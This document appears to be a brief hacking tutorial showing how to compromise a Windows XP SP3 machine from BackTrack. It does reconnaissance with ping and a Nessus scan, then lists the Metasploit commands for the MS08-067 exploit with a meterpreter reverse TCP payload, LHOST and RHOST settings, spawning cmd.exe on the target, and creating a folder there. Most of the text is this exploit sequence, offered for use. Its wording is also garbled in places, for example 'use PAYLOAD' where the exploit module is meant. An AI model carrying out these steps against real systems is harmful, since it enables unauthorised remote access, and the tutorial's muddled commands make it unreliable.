Hacking Backtrack exploid to windows xp SP3

       In the process of hacking there are several processes that have to do is (IG) Information Gathering (collecting information) -> (SE) Service information (see the running processes and open) -> (VA) Vull Abeliti Asesemen ( find vulnerabilities)-> Eksploid

1. Proccess First IG with ping backtrak and windows xp -> scan with tool nessus to know SI (process running) and VA (find vurnerabilities to windows xp) .
 
a. ip window and ping windows xp -> backtrack
scan ipconfig windows


scan ping to backtrack



b. ip backtrack and ping backtrack -> xp


scan ifconfig backtrack



scan ping to xp



C. result scan nessus

from nessus scan results there are two processes that are vulnerable to the hack. Namely SMB and Windows Server servive. Here I will try the second vulnerability.


2. open metasploid to terminal Msfconsole




3.use PAYLOAD windows/smb/   (payload is bring executions in eksploid)

use PAYLOAD windows/smb/ms08_067_netapi
* LOOK NESSUS KODE HIGH MS08_067 AND MS09_001. AND SEARCH TO EKSPLOID




4. set PAYLOAD windows/meterpreter/reverse_tcp


5. set LHOST and set RHOST
*LHOST: is ip attacker (backtrack)

*RHOST: is ip to attacked (windows)

has entered into windows

6. exploit



7. go into windows xp : execute -f cmd.exe -M -i

8. example exploid , Create a folder in windows xp

mkdir keren_nih_bisa_hack